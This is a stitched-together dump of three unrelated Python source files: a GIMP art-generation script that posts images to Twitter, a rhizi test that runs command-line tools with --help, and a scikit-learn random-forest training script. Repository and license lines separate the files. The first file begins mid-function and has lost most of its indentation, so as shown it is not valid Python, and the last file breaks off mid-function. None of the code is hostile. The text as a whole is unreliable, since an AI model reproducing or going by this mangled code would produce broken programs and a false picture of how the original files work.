tweet_text = tweet_text + '\n'+hashtagString(139-len(tweet_text))
return tweet_text
def tweetImage(message,image_file):
global settings_data
CONSUMER_KEY = settings_data['twitter']['consumer_key']
CONSUMER_SECRET = settings_data['twitter']['consumer_secret']
ACCESS_TOKEN_KEY = settings_data['twitter']['access_token_key']
ACCESS_TOKEN_SECRET = settings_data['twitter']['access_token_secret']
api = TwitterAPI.TwitterAPI(CONSUMER_KEY, CONSUMER_SECRET, ACCESS_TOKEN_KEY, ACCESS_TOKEN_SECRET)
file = open(image_file, 'rb')
data = file.read()
r = api.request('statuses/update_with_media', {'status':message}, {'media[]':data})
return str(str(r.status_code))
def qS():
# quick set up of default size image
imageSetup()
def qXJ(comment=""):
# quick export jpg default with unique file name
global settings_data
settings_data['path']['export_name'] = str(settings_data['path']['default_save_path'])+'art-'+dt.datetime.now().strftime('%Y%m%d%H%M%S')+'-'+choice(letters)+choice(letters)+choice(letters)+'.jpg'
if comment=="":
comment=tweetText(0)
saved=saveJPG(settings_data['path']['export_name'],comment)
qXDT(saved[1],comment)
sleep(1)
return saved
def qXP(comment=""):
# quick export png default with unique file name
global settings_data
settings_data['path']['export_name'] = str(settings_data['path']['default_save_path'])+'art-'+dt.datetime.now().strftime('%Y%m%d%H%M%S')+'-'+choice(letters)+choice(letters)+choice(letters)+'.png'
image = gimp.image_list()[0]
if comment=="":
comment=tweetText(0)
saved = savePNG(settings_data['path']['export_name'])
qXDT(saved[1],comment)
return saved
def qG(comment="",delay=100):
    # quick export animated gif with unique file name
global settings_data
settings_data['path']['export_name'] = str(settings_data['path']['default_save_path'])+'animation-'+dt.datetime.now().strftime('%Y%m%d%H%M%S')+'-'+choice(letters)+choice(letters)+choice(letters)+'.gif'
image = gimp.image_list()[0]
if comment=="":
comment=tweetText(0)
saved = saveGIF(settings_data['path']['export_name'],delay)
qXDT(saved[1],comment)
return saved
def qP(fn=""):
# quick save project
global settings_data
if fn=="":
fn = str(settings_data['path']['project_folder'])+'project-'+dt.datetime.now().strftime('%Y%m%d%H%M%S')+'-'+choice(letters)+choice(letters)+choice(letters)+'.xcf'
saveXCFProject(fn)
def qX(comment=""):
    # quick export to preferred file type
global settings_data
export_modes = {"qXJ" : qXJ,
"qXP" : qXP,
"qG" : qG}
try:
mode=str(settings_data['image']['export_mode'])
return export_modes[mode](comment)
except:
mode='qXJ'
return export_modes[mode](comment)
def qT():
    # generate tweet text, export via qX(), then send the tweet and return the results
global settings_data
tweet = tweetText(0)
exported=qX(comment=tweet)
sleep(5)
return (tweetImage(tweet, exported[1]) == '200', tweet)
def qTG():
    # generate tweet text, export an animated gif via qG(), then send the tweet and return the results
global settings_data
tweet = tweetText(0)
exported=qG()
return (tweetImage(tweet, exported[1]) == '200', tweet)
def qXDT(fn,comment=""):
global settings_data
setEXIFTags(fn,{"Copyright":settings_data['user']['author']+" "+dt.datetime.now().strftime('%Y'),
"License":settings_data['image']['license'],
"Comment":comment,
"XPComment":comment,
"Description":comment,
"ImageDescription":comment,
"SEMInfo":comment,
"Artist":settings_data['user']['author'],
"Author":settings_data['user']['author'],
"Software":"GIMP 2.8 Python 2.7 EXIFTool",
"Title":comment[:comment.find('\n')],
"XPTitle":comment[:comment.find('\n')],
"Make":"GIMP",
"Model":"Python",
"Rating":"5"})
def paint():
# Full auto painting
global settings_data
image = gimp.image_list()[0]
height = image.height
width = image.width
x_center = width/2
y_center = height/2
image.height
image.width
randomBlend()
loop_range = range(0, random.choice((3, 4, 5, 6)))
loop_range.reverse()
title = imageTitle(2)
for x in loop_range:
# 1. add layer
layer_add_par = {'opacity': 100, 'msk': 1}
addNewLayer(**layer_add_par)
layer_mode_par = {'layer': pdb.gimp_image_get_active_layer(image), 'mode': random.randrange(0, 25)}
pdb.gimp_layer_set_mode(layer_mode_par['layer'], layer_mode_par['mode'])
editLayerMask(0)
drawable = pdb.gimp_image_active_drawable(image)
# 1. paint layer
if random.choice((0, 1, 1, 1)):
plasma_par = {'Image': image, 'Draw': drawable, 'Seed': random.randrange(1, 1000),
'Turbulence': random.choice(
(0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 1.0, 1.5, 1.1, 1.4, 1.8, 2.0, 2.7))}
pdb.plug_in_plasma(plasma_par['Image'], plasma_par['Draw'], plasma_par['Seed'], plasma_par['Turbulence'])
if random.choice((0, 1, 1, 1, 1)):
drawRays_par = {'Number': random.choice((5, 10, 50, 100, 300)),
'Length': random.choice((80, 160, 240, 400, height / 4, height / 3, height / 2)),
'X': random.choice((width / 2, width / 3, width / 4)),
'Y': random.choice((height / 4, height / 3, height / 2))}
drawRays(drawRays_par['Number'], drawRays_par['Length'], drawRays_par['X'], drawRays_par['Y'])
# 1. mask edit
editLayerMask(1)
drawable = pdb.gimp_image_active_drawable(image)
plasma_par = {'Image': image, 'Draw': drawable, 'Seed': random.randrange(1, 1000), 'Turbulence': random.choice(
(0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 1.0, 1.5, 1.1, 1.4, 1.8, 2.0, 2.7))}
pdb.plug_in_plasma(plasma_par['Image'], plasma_par['Draw'], plasma_par['Seed'], plasma_par['Turbulence'])
if random.choice((0, 1, 1, 1, 1)):
drawRays_par = {'Number': random.choice((5, 10, 50, 100, 300)),
'Length': random.choice((80, 160, 240, 400, height / 4, height / 3, height / 2)),
'X': random.choice((width / 2, width / 3, width / 4)),
'Y': random.choice((height / 4, height / 3, height / 2))}
drawRays(drawRays_par['Number'], drawRays_par['Length'], drawRays_par['X'], drawRays_par['Y'])
editLayerMask(0)
# 2. add layer
layer_add_par = {'opacity': random.randrange(70, 100), 'msk': 1}
addNewLayer(**layer_add_par)
layer_mode_par = {'layer': pdb.gimp_image_get_active_layer(image), 'mode': random.randrange(0, 25)}
pdb.gimp_layer_set_mode(layer_mode_par['layer'], layer_mode_par['mode'])
editLayerMask(0)
# 2. paint layer
if x % 4 == 0:
drawBars_par = {'Number': random.choice((2, 3, 4, 5, 6, 7, 8, 12, 16, 32, 64, 128)),
'Mode': random.choice((0, 0, 3))}
drawBars(drawBars_par['Number'], drawBars_par['Mode'])
randomBlend()
# 2. mask edit
editLayerMask(1)
image = gimp.image_list()[0]
drawable = pdb.gimp_image_active_drawable(image)
plasma_par = {'Image': image, 'Draw': drawable, 'Seed': random.randrange(1, 1000), 'Turbulence': random.choice(
(0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 1.0, 1.5, 1.1, 1.4, 1.8, 2.0, 2.7))}
pdb.plug_in_plasma(plasma_par['Image'], plasma_par['Draw'], plasma_par['Seed'], plasma_par['Turbulence'])
randomBlend()
editLayerMask(0)
image = gimp.image_list()[0]
# 3. add layer
layer_add_par = {'opacity': random.randrange(55, 100), 'msk': 1}
addNewLayer(**layer_add_par)
layer_mode_par = {'layer': pdb.gimp_image_get_active_layer(image), 'mode': random.randrange(0, 25)}
pdb.gimp_layer_set_mode(layer_mode_par['layer'], layer_mode_par['mode'])
if random.choice((0, 1)):
fill_par = {'num': random.choice((1, 1, 1, 1, 1, 1, 1, 1, 2, 3, 3, 3, 3, 4, 5, 8, 9, 12, 24, 64, 128, 512)),
'size': random.randrange(15, height), 'opt': 3, 'sq': random.choice((0, 1))}
randomCircleFill(**fill_par)
if random.choice((0, 1)):
fill_par = {'num': random.choice((1, 1, 1, 1, 1, 1, 1, 1, 2, 3, 3, 3, 3, 4, 5, 8, 9, 12, 24, 64, 128, 512)),
'size': random.randrange(15, height), 'opt': 3, 'sq': random.choice((0, 1))}
randomRectFill(**fill_par)
editLayerMask(0)
# 3. paint layer
if random.choice((0, 1, 1, 1, 1)):
drawRays_par = {'rays': random.choice((3, 5, 10, 15, 30, 45)), 'rayLength': random.choice(
(width / 4, width / 3, width / 2, 4 * (width / 5), 3 * (width / 4), 2 * (width / 3))),
'centerX': random.choice((width / 4, width / 3, width / 2, 4 * (width / 5), 3 * (width / 4),
2 * (width / 3))), 'centerY': random.choice(
(height / 4, height / 3, height / 2, 4 * (height / 5), 3 * (height / 4), 2 * (height / 3)))}
drawRays(**drawRays_par)
if random.choice((0, 1)):
fill_par = {'num': random.choice((1, 1, 1, 1, 1, 1, 1, 1, 2, 3, 3, 3, 3, 4, 5, 8, 9, 12, 24, 64, 128, 512)),
'size': random.randrange(15, height), 'opt': 3, 'sq': random.choice((0, 1))}
randomCircleFill(**fill_par)
if random.choice((0, 1)):
fill_par = {'num': random.choice((1, 1, 1, 1, 1, 1, 1, 1, 2, 3, 3, 3, 3, 4, 5, 8, 9, 12, 24, 64, 128, 512)),
'size': random.randrange(15, height), 'opt': 3, 'sq': random.choice((0, 1))}
randomRectFill(**fill_par)
if random.choice((0, 1)):
randomBrush()
if random.choice((0, 1)):
randomDynamics()
if random.choice((0, 1, 1, 1, 1)):
brushSize(50)
drawTree_par = {'x1': random.randrange(width / 4, 3 * (width / 4)),
'y1': random.randrange(height / 4, 3 * (height / 4)), 'angle': random.randrange(0, 360),
'depth': random.randrange(5, 7)}
drawOddTree(**drawTree_par) # x1, y1, angle, depth
if random.choice((0, 1, 1, 1, 1)):
if random.choice((0, 1, 1, 1, 1)):
brushSize(random.randrange(20, (height / 3)))
if random.choice((0, 1, 1, 1, 1)):
brushColor()
drawRays_par = {'rays': random.choice((10, 50, 100)),
'rayLength': random.choice((80, 160, 240, 400, height / 4, height / 3, height / 2)),
'centerX': random.choice(
((x_center + x_center / 2), x_center, x_center / 2, x_center / 3, x_center / 4)),
'centerY': random.choice(
((x_center + x_center / 2), x_center, x_center / 2, x_center / 3, x_center / 4))}
drawRays(**drawRays_par)
# 3. mask edit
editLayerMask(1)
image = gimp.image_list()[0]
drawable = pdb.gimp_image_active_drawable(image)
plasma_par = {'Image': image, 'Draw': drawable, 'Seed': random.randrange(1, 1000), 'Turbulence': random.choice(
(0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 1.0, 1.5, 1.1, 1.4, 1.8, 2.0, 2.7))}
pdb.plug_in_plasma(plasma_par['Image'], plasma_par['Draw'], plasma_par['Seed'], plasma_par['Turbulence'])
# 4. add layer
layer_add_par = {'opacity': random.randrange(55, 100), 'msk': 1}
addNewLayer(**layer_add_par)
layer_mode_par = {'layer': pdb.gimp_image_get_active_layer(image), 'mode': random.randrange(0, 25)}
pdb.gimp_layer_set_mode(layer_mode_par['layer'], layer_mode_par['mode'])
brushSize(-1)
editLayerMask(0)
# 4. paint layer
if random.choice((0, 1, 1, 1, 1)):
drawSin_par = {
'bar_space': random.choice((16, 18, 19, 20, 21, 51, 52, 53, 54, 56, 55, 57, 58, 59)),
'bar_length': random.choice((10, 100, height / 3)),
'mag': random.choice((40, 69, 120, 200, 300, 400, height / 2)),
'x_offset': 0,
'y_offset': random.randrange(height / 12, height)
}
drawSinWave(**drawSin_par)
if random.choice((0, 1, 1, 1, 1)):
drawForest(random.randrange(15, 64), 0)
if random.choice((0, 1, 1, 1, 1)):
# 5. mask edit
editLayerMask(1)
image = gimp.image_list()[0]
drawable = pdb.gimp_image_active_drawable(image)
plasma_par = {'Image': image, 'Draw': drawable, 'Seed': random.randrange(1, 1000),
'Turbulence': random.choice(
(0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 1.0, 1.5, 1.1, 1.4, 1.8, 2.0, 2.7))}
pdb.plug_in_plasma(plasma_par['Image'], plasma_par['Draw'], plasma_par['Seed'], plasma_par['Turbulence'])
if random.choice((0, 1)):
fill_par = {
'num': random.choice((1, 1, 1, 1, 1, 1, 1, 1, 2, 3, 3, 3, 3, 4, 5, 8, 9, 12, 24, 64, 128, 512)),
'size': random.randrange(15, height), 'opt': 3, 'sq': random.choice((0, 1))}
randomCircleFill(**fill_par)
if random.choice((0, 1)):
fill_par = {
'num': random.choice((1, 1, 1, 1, 1, 1, 1, 1, 2, 3, 3, 3, 3, 4, 5, 8, 9, 12, 24, 64, 128, 512)),
'size': random.randrange(15, height), 'opt': 3, 'sq': random.choice((0, 1))}
randomRectFill(**fill_par)
flatten()
image = gimp.image_list()[0]
drawable = pdb.gimp_image_active_drawable(image)
canvas_par = {'Image': image, 'Draw': drawable, 'Direction': 1, 'Depth': 1}
pdb.plug_in_apply_canvas(canvas_par['Image'], canvas_par['Draw'], canvas_par['Direction'], canvas_par['Depth'])
def dimensionality(folder='',tweet=0):
# automated creation of dimensionality study piece
global settings_data
if folder == '':
folder = settings_data['path']['art_folder']+"resources/"+random.choice(["photos","fractals","plants","rock"])+"/"
loadDirLayer(folder,9699690)
if random.choice([0,0,0,0,1,1,1]):
flatten()
mirror()
def fractalMasking():
    # fractal layered with tile masks
if random.choice([0,0,0,0,1,1,1]):
image=gimp.image_list()[0]
drawable = pdb.gimp_image_active_drawable(image)
pdb.gimp_invert(drawable)
for x in range(random.choice([3,6,7,8,9,10])):
addFractal()
tile([random.choice([1,2,3,4,5,6,7,8,12]),random.choice([1,2,3,4,5,6,7,8,12])])
if random.choice([0,0,0,0,1,1,1]):
flatten()
mirror()
def randomMasking():
# tile mask from random resources
image=gimp.image_list()[0]
drawable = pdb.gimp_image_active_drawable(image)
if random.choice([0,0,0,0,1,1,1]):
pdb.gimp_invert(drawable)
for x in range(random.choice([13,6,7,8,9,10])):
qRes(opacity=random.choice([13,25,33,50,66,75,85]))
layer_mode_par = {'layer': pdb.gimp_image_get_active_layer(image), 'mode': random.randrange(0, 25)}
pdb.gimp_layer_set_mode(layer_mode_par['layer'], layer_mode_par['mode'])
if 25 > random.randrange(0,100):
tile([random.randrange(1,12),random.randrange(1,12)])
if random.choice([0,0,0,0,1,1,1]):
flatten()
mirror()
def hybridMasking(option="SpBGsp", noise=0.3):
# masking resources with lots of options
drawInkBlot()
if 'SpBG' in option:
addSpacePhoto(opacity=50)
if "Re" in option:
applyEffect()
for x in range(4,(10+random.randrange(int(noise*5*-1),int(noise*10)))):
if 'ph'in option:
qRes()
if "Re" in option:
applyEffect()
tile([random.randrange(1,12),random.randrange(1,12)])
if "Re" in option:
editLayerMask(1)
applyEffect()
editLayerMask(0)
if 'sc' in option:
qRes()
if "Re" in option:
applyEffect()
tile([random.randrange(1,12),random.randrange(1,12)])
if "Re" in option:
editLayerMask(1)
applyEffect()
editLayerMask(0)
if 'sp' in option:
qRes()
if "Re" in option:
applyEffect()
tile([random.randrange(1,12),random.randrange(1,12)])
if "Re" in option:
editLayerMask(1)
applyEffect()
editLayerMask(0)
if 'fr' in option:
qRes()
if "Re" in option:
applyEffect()
tile([random.randrange(1,12),random.randrange(1,12)])
if "Re" in option:
editLayerMask(1)
applyEffect()
editLayerMask(0)
if random.choice([0,0,0,0,1,1,1]):
flatten()
mirror()
def spikeDif():
# draw spike ball or random rays
spikeBallStack(depth=random.choice([3,3,4,5,6,8,10,12,16,20]))
applyEffect()
if random.choice([0,0,0,0,1,1,1]):
flatten()
mirror()
def inkBlot():
    # draw basic ink blot
inkBlotStack()
applyEffect()
if random.choice([0,0,0,0,1,1,1]):
flatten()
mirror()
def skeleton(type="",num=10,delay=10,tweet=1,study_name="Multifunctional Study"):
    # take care of exporting, and optionally tweeting, every image produced
automations = {"spikeDif" : spikeDif,
"inkBlot" : inkBlot,
"hybridMasking" : hybridMasking,
"paint" : paint,
"fractalMasking" : fractalMasking,
"randomMasking" : randomMasking}
for i in range(0,num):
qS()
# ################## #
# This is the nugget #
# ################## #
if type == "":
            automation_pick = random.choice(list(automations.keys()))
print(automation_pick)
automations[automation_pick]()
else:
automations[type]()
if tweet:
signImage()
flatten()
tweet=imageTitle(2)+'\n by Jared Haer\n'+study_name+'\n'
tweetImage(tweet+hashtagString(len(tweet)),qX()[1])
print(tweet)
closeAll()
sleep(delay)
else:
qX()
closeAll()
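# Illustrative usage sketch (an assumption, not part of the original script):
# skeleton() picks one of the automation functions defined above, renders the
# piece, then exports (and optionally tweets) it. From the GIMP python-fu
# console it might be invoked like:
#
#   skeleton(type="inkBlot", num=3, delay=5, tweet=0)  # three ink-blot pieces, no tweeting
#   skeleton(num=10)                                    # ten pieces, random automation each time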
def doWeatherPainting():
# draw day
# -draw sun
# -draw clouds
# draw night
# -draw sun
# -draw clouds
print('weather painting?')
def addResource(options=0, resource_type="rock", opacity=90, resource_folder="", scale=[], position=[]):
avoid_folders=['brushes','fonts','gradients','mask','overlays','paths','scraps','signature','stamps','stickers','stock-image','templates','tiles']
if resource_type == "random":
cl=dict(Counter(os.listdir(settings_data['path']['art_folder']+'/resources/'))-Counter(avoid_folders)).keys()
resource_type = random.choice(cl)
if resource_folder == "":
resource_folder = settings_data['path']['art_folder']+'/resources/'+resource_type+'/'
resource_file = ""
resource_files = []
if options == 0:
if resource_type == "":
for file in os.listdir(resource_folder):
if os.path.isdir(resource_folder+file):
for sub_file in os.listdir(resource_folder+file+'/'):
if 'png' in sub_file:
resource_files.append(file+'/'+sub_file)
if 'jpg' in sub_file:
resource_files.append(file+'/'+sub_file)
else:
if 'png' in file:
resource_files.append(file)
if 'jpg' in file:
resource_files.append(file)
else:
for file in os.listdir(resource_folder):
if 'png' in file:
resource_files.append(file)
if 'jpg' in file:
resource_files.append(file)
resource_file = resource_folder+random.choice(resource_files)
loadLayer(resource_file)
image = gimp.image_list()[0]
active_layer = pdb.gimp_image_get_active_layer(image)
pdb.gimp_layer_set_opacity(active_layer, opacity)
if scale==[]:
pdb.gimp_layer_scale(active_layer, image.width, image.height, 0)
else:
pdb.gimp_layer_scale(active_layer, scale[0], scale[1], 0)
if position == []:
pdb.gimp_layer_set_offsets(active_layer, 0, 0)
else:
pdb.gimp_layer_set_offsets(active_layer, position[0], position[1])
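# Illustrative usage sketch (an assumption, not part of the original script):
# addResource() loads a random png/jpg from the chosen resource folder as a new
# layer, then applies the requested opacity, scale and offset, e.g.:
#
#   addResource(resource_type="random", opacity=75)                        # stretch to the full canvas
#   addResource(resource_type="rock", scale=[512, 512], position=[64, 64])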
def qRes(options=0, sticker_type="random", opacity=90, sticker_folder="", scale=[], position=[]):
if sticker_folder == "" and not sticker_type == 'random':
        sticker_folder = settings_data['path']['art_folder']+'/resources/'+sticker_type+'/'
addResource(options, sticker_type, opacity, sticker_folder, scale, position)
def addSticker(options=0, sticker_type="", opacity=90, sticker_folder="", scale=[], position=[]):
if sticker_folder == "":
sticker_folder = settings_data['path']['art_folder']+'/resources/stickers/'
addResource(options, sticker_type, opacity, sticker_folder, scale, position)
def addFractal(options=0, fractal_type="", opacity=90, fractal_folder="", scale=[], position=[]):
image = gimp.image_list()[0]
if fractal_folder == "":
fractal_folder = settings_data['path']['art_folder']+'/resources/fractals/'
if position == []:
position = [0,0]
if scale == []:
scale=[image.width, image.height]
addResource(options, fractal_type, opacity, fractal_folder, scale, position)
active_layer = pdb.gimp_image_get_active_layer(image)
pdb.gimp_layer_set_mode(active_layer, random.choice([17,6,15,0,0,0,0,0,0]))
def addPhoto(options=0, photo_type="", opacity=90, photo_folder="", scale=[], position=[]):
image = gimp.image_list()[0]
if photo_folder == "":
photo_folder = settings_data['path']['art_folder']+'/resources/photos/'
if position == []:
position = [0,0]
if scale == []:
scale=[image.width, image.height]
addResource(options, photo_type, opacity, photo_folder, scale, position)
active_layer = pdb.gimp_image_get_active_layer(image)
pdb.gimp_layer_set_mode(active_layer, random.choice([17,6,15,0,0,0,0,0,0]))
def addSpacePhoto(options=0, type="", opacity=90, space_folder="", scale=[], position=[]):
image = gimp.image_list()[0]
if space_folder == "":
space_folder = settings_data['path']['art_folder']+'/resources/space/'
if position == []:
position = [0,0]
if scale == []:
scale=[image.width, image.height]
addResource(options, type, opacity, space_folder, scale, position)
active_layer = pdb.gimp_image_get_active_layer(image)
pdb.gimp_layer_set_mode(active_layer, random.choice([17,6,15,0,0,0,0,0,0]))
def addScriptDrawing(options=0, type="", opacity=90, script_folder="", scale=[], position=[]):
image = gimp.image_list()[0]
if script_folder == "":
script_folder = settings_data['path']['art_folder']+'/resources/script_drawings/'
if position == []:
position = [0,0]
if scale == []:
scale=[image.width, image.height]
addResource(options, type, opacity, script_folder, scale, position)
active_layer = pdb.gimp_image_get_active_layer(image)
pdb.gimp_layer_set_mode(active_layer, random.choice([17,6,15,0,0,0,0,0,0]))
|
mit
|
Rhizi/rhizi
|
rhizi/tests/test_binaries.py
|
1
|
4163
|
# coding: utf-8
import unittest
import os
import sys
import subprocess
from glob import glob
import time
from tempfile import TemporaryFile, mktemp
from six import u
root_path = os.path.realpath(os.path.join(os.path.dirname(__file__), '..', '..'))
bin_path = os.path.join(root_path, 'bin')
def which(f):
return [p for p in [os.path.join(x, f) for x in os.environ['PATH'].split(':')] if os.path.exists(p)][0]
python_bin = which('python')
def run_python_script(s, args):
    # the exec()-based path below is not working right now, so run the script the long way (as a subprocess)
return run_process(python_bin, [s] + args)
with open(s) as fd:
old_argv = sys.argv
sys.argv = [s] + args
try:
exec(fd.read())
except Exception as e:
ret = -1, str(e)
else:
ret = 0, None
sys.argv = old_argv
return ret
def run(f, args):
run_python = False
with open(f) as fd:
first_line = fd.readline()
run_python = first_line[:2] == '#!' and 'python' in first_line
if run_python:
return run_python_script(f, args)
else:
return run_process(f, args)
def run_process(f, args):
null = TemporaryFile()
print(str([f] + args))
env = dict(PYTHONPATH=root_path,
LC_ALL='en_US.UTF-8',
LANG='en_US.UTF-8')
proc = subprocess.Popen([f] + args, env=env, stdout=null, stderr=null)
max = 5
dt = 0.1
t = 0
while t < max:
if proc.poll() is not None:
break
t += dt
time.sleep(dt)
if proc.poll() is None:
ret = None # still running is fine - rz_server will run
proc.terminate()
else:
ret = proc.poll()
if ret is None:
return ret, None
null.seek(0)
return ret, null.read().decode('utf-8')
def temp_file(contents):
filename = mktemp()
with open(filename, 'w+') as fd:
fd.write(contents)
return filename
class TestBinaries(unittest.TestCase):
def _helper_test_a_tool(self, bin_name, args):
filename = os.path.join(bin_path, bin_name)
ret, msg = run(filename, args)
self.assertTrue(ret == 0,
msg=u("failed to run {} {}, ret = {}, msg:\n{}").format(
bin_name, args, ret, msg))
def _run_user_tool(self, args):
if not isinstance(args, list):
args = args.split()
self._helper_test_a_tool('rz-user-tool', args)
def test_root_path(self):
"""
helper test for test_binaries
"""
self.assertTrue(os.path.exists(os.path.join(root_path, 'setup.py')))
def test_sanitybinaries(self):
"""
        check that every script in bin/* can execute with --help
        some scripts may create log files and access the database as side effects.
"""
for bin_name in [os.path.basename(p) for p in glob(os.path.join(bin_path, '*'))]:
      self._helper_test_a_tool(bin_name, ['--help'])
def test_user_tool(self):
"""
test rz-user-tool
do a whole cycle:
init a new file
add a user to it
list the users
"""
userdb_filename = mktemp()
password_filename = temp_file('12345678')
myugid = subprocess.check_output('whoami').strip().decode('utf-8') # assume group = user exists
self._run_user_tool('init --user-db-path {} --user-db-ugid {}'.format(userdb_filename, myugid))
self._run_user_tool(('add --user-db-path {} --password-file {} ' \
'--first-name hiro --last-name protagonist ' \
'--username hiro --email [email protected]').format(
userdb_filename, password_filename))
self._run_user_tool(['add', '--user-db-path', userdb_filename, '--verbose',
'--first-name', 'מורה', '--last-name', 'נבוכים',
'--username', 'מורה', '--email', '[email protected]',
'--password-file', password_filename])
self._run_user_tool('list --user-db-path {} --verbose'.format(userdb_filename))
|
agpl-3.0
|
exowanderer/SpitzerDeepLearningNetwork
|
Python Scripts/sklearn_RandomForests_training.py
|
1
|
29664
|
from argparse import ArgumentParser
ap = ArgumentParser()
ap.add_argument('-ns' , '--n_resamp' , required=False, type=int , default=1 , help="Number of resamples to perform (GBR=1; No Resamp=0)")
ap.add_argument('-nt' , '--n_trees' , required=False, type=int , default=100 , help="Number of trees in the forest")
ap.add_argument('-c' , '--core' , required=False, type=int , default=0 , help="Which Core to Use GBR only Uses 1 Core at a time.")
ap.add_argument('-std', '--do_std' , required=False, type=bool, default=False, help="Use Standard Random Forest Regression")
ap.add_argument('-pca', '--do_pca' , required=False, type=bool, default=False, help="Use Standard Random Forest Regression with PCA preprocessing")# nargs='?', const=True,
ap.add_argument('-ica', '--do_ica' , required=False, type=bool, default=False, help="Use Standard Random Forest Regression with ICA preprocessing")
ap.add_argument('-rfi', '--do_rfi' , required=False, type=bool, default=False, help="Use Standard Random Forest Regression with random forest importance (RFI) preprocessing")
ap.add_argument('-gbr', '--do_gbr' , required=False, type=bool, default=False, help="Use Gradient Boosting Regression with PCA preprocessing")
ap.add_argument('-rs' , '--random_state', required=False, type=bool, default=False, help="Use a fixed random state (seed) for reproducibility")
ap.add_argument('-pdb', '--pdb_stop' , required=False, type=bool, default=False, help="Stop the trace at the end with pdb.set_trace()")
ap.add_argument('-nj', '--n_jobs' , required=False, type=int , default=-1 , help="Number of cores to use Default:-1")
args = vars(ap.parse_args())
do_std = args['do_std']
do_pca = args['do_pca']
do_ica = args['do_ica']
do_rfi = args['do_rfi']
do_gbr = args['do_gbr']
pdb_stop= args['pdb_stop']
n_jobs = args['n_jobs']
if n_jobs == 1: print('WARNING: You are only using 1 core!')
# Check whether more than one operation was requested;
# if so, garbage-collect the fitted models between runs to free memory
need_gc = sum([args[key] for key in args.keys() if 'do_' in key]) > 1
importance_filename = 'randForest_STD_feature_importances.txt'
from glob import glob  # needed here: glob is used on the next line, before the bulk imports below
if do_rfi and not len(glob(importance_filename)): do_std = True
import pandas as pd
import numpy as np
# import tensorflow as tf
# tf.logging.set_verbosity(tf.logging.ERROR)
import pdb
import warnings
warnings.filterwarnings("ignore")
import gc
from argparse import ArgumentParser
# from matplotlib import pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler, MinMaxScaler, minmax_scale
from sklearn.ensemble import RandomForestRegressor, ExtraTreesRegressor, AdaBoostRegressor, GradientBoostingRegressor
from sklearn.decomposition import PCA, FastICA
from sklearn.externals import joblib
from sklearn.metrics import r2_score
from tqdm import tqdm
from glob import glob
# plt.rcParams['figure.dpi'] = 300
# from corner import corner
from time import time
start0 = time()
def setup_features(dataRaw, label='flux', notFeatures=[], transformer=PCA(whiten=True), feature_scaler=StandardScaler(),
label_scaler=None, verbose=True, returnAll=None):
"""Example function with types documented in the docstring.
For production level usage: All scaling and transformations must be done
with respect to the calibration data distributions
    Args:
        dataRaw (DataFrame or str): raw input data, or a path to a CSV file.
        label (str): name of the label column (default 'flux').
        notFeatures (list): columns to exclude from the feature set.
        transformer: optional sklearn transformer (e.g. PCA) fit to the scaled features.
        feature_scaler: optional sklearn scaler fit to the raw features.
        label_scaler: optional sklearn scaler fit to the labels.
Returns:
features_scaled_transformed, labels_scaled
.. _PEP 484:
https://github.com/ExoWanderer/
"""
# notFeatures = list(notFeatures)
# notFeatures.append(label) if label not in notFeatures else None
    dataRaw = pd.read_csv(dataRaw) if isinstance(dataRaw,str) else dataRaw
inputData = dataRaw.copy()
PLDpixels = pd.DataFrame({key:dataRaw[key] for key in dataRaw.columns if 'pix' in key})
    print('PLD pixels: shape {}, columns {}'.format(PLDpixels.shape, list(PLDpixels.columns)))
# PLDpixels = {}
# for key in dataRaw.columns.values:
# if 'pix' in key:
# PLDpixels[key] = dataRaw[key]
#
# PLDpixels = pd.DataFrame(PLDpixels)
PLDnorm = np.sum(np.array(PLDpixels),axis=1)
PLDpixels = (PLDpixels.T / PLDnorm).T
# Overwrite the PLDpixels entries with the normalized version
for key in dataRaw.columns:
if key in PLDpixels.columns:
inputData[key] = PLDpixels[key]
# testPLD = np.array(pd.DataFrame({key:inputData[key] for key in inputData.columns.values if 'pix' in key})) if verbose else None
# assert(not sum(abs(testPLD - np.array(PLDpixels))).all()) if verbose else None
# print('Confirmed that PLD Pixels have been Normalized to Spec') if verbose else None
labels = inputData[label].values
inputData = inputData.drop(label, axis=1) # remove
feature_columns = inputData.drop(notFeatures,axis=1).columns.values
features = inputData.drop(notFeatures,axis=1).values
print('Shape of Features Array is', features.shape) if verbose else None
if verbose: start = time()
labels_scaled = label_scaler.fit_transform(labels[:,None]).ravel() if label_scaler is not None else labels
features_scaled = feature_scaler.fit_transform(features) if feature_scaler is not None else features
features_trnsfrmd = transformer.fit_transform(features_scaled) if transformer is not None else features_scaled
print('took {} seconds'.format(time() - start)) if verbose else None
if returnAll == True:
return features_trnsfrmd, labels_scaled, dataRaw, transformer, label_scaler, feature_scaler
if returnAll == 'features':
return features_trnsfrmd
if returnAll == 'labels':
return labels_scaled
    if returnAll == 'both with raw data':
        return features_trnsfrmd, labels_scaled, dataRaw
return features_trnsfrmd, labels_scaled
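# Illustrative sketch (an assumption, not part of the original pipeline): calling
# setup_features() on a tiny synthetic frame. The 'pix*' column names follow the
# naming convention the function looks for when normalizing the PLD pixels.
#
#   demo = pd.DataFrame({'flux': np.random.rand(8),
#                        'pix1': np.random.rand(8), 'pix2': np.random.rand(8)})
#   X, y = setup_features(demo, label='flux', transformer=None,
#                         feature_scaler=StandardScaler(), verbose=False)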
def predict_with_scaled_transformer(dataRaw, notFeatures=None, transformer=None, feature_scaler=None, label_scaler=None, verbose=False):
"""Example function with types documented in the docstring.
For production level usage: All scaling and transformations must be done
with respect to the calibration data distributions
    Args:
        dataRaw (DataFrame or str): raw input data, or a path to a CSV file.
        notFeatures (list): columns to exclude from the feature set.
        transformer: previously fitted transformer (e.g. PCA); applied with .transform().
        label_scaler: previously fitted label scaler; applied with .transform().
        feature_scaler: previously fitted feature scaler; applied with .transform().
Returns:
features_scaled_transformed, labels_scaled
.. _PEP 484:
https://github.com/ExoWanderer/
"""
    dataRaw = pd.read_csv(dataRaw) if isinstance(dataRaw,str) else dataRaw
PLDpixels = pd.DataFrame({key:dataRaw[key] for key in dataRaw.columns if 'pix' in key})
# PLDpixels = {}
# for key in dataRaw.columns.values:
# if 'pix' in key:
# PLDpixels[key] = dataRaw[key]
# PLDpixels = pd.DataFrame(PLDpixels)
PLDnorm = np.sum(np.array(PLDpixels),axis=1)
PLDpixels = (PLDpixels.T / PLDnorm).T
